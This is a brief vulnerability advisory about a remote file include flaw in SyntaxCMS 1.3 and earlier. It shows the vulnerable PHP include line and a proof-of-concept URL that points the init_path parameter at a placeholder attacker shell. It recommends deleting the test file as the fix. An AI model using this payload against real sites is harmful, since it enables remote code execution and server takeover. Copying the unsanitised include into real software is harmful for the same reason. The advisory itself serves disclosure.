SyntaxCMS <= 1.3 (0004_init_urls.php) Remote File Include Vulnerability

2006-09-24 00:00:00

Remote File Include in syntaxCMS

Vulnerable File:
0004_init_urls.php

Vulnerable Code:

1 <?php

2 include_once( $init_path . '/init.urls.php' );

3 ?>

PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&

Solution:

Remove This File...it's not needed...just used for tests

Found by MoHaJaLi

Greetz to Eddy_BAck0o

#

Fixes

No fixes

In order to submit a new fix you need to be registered.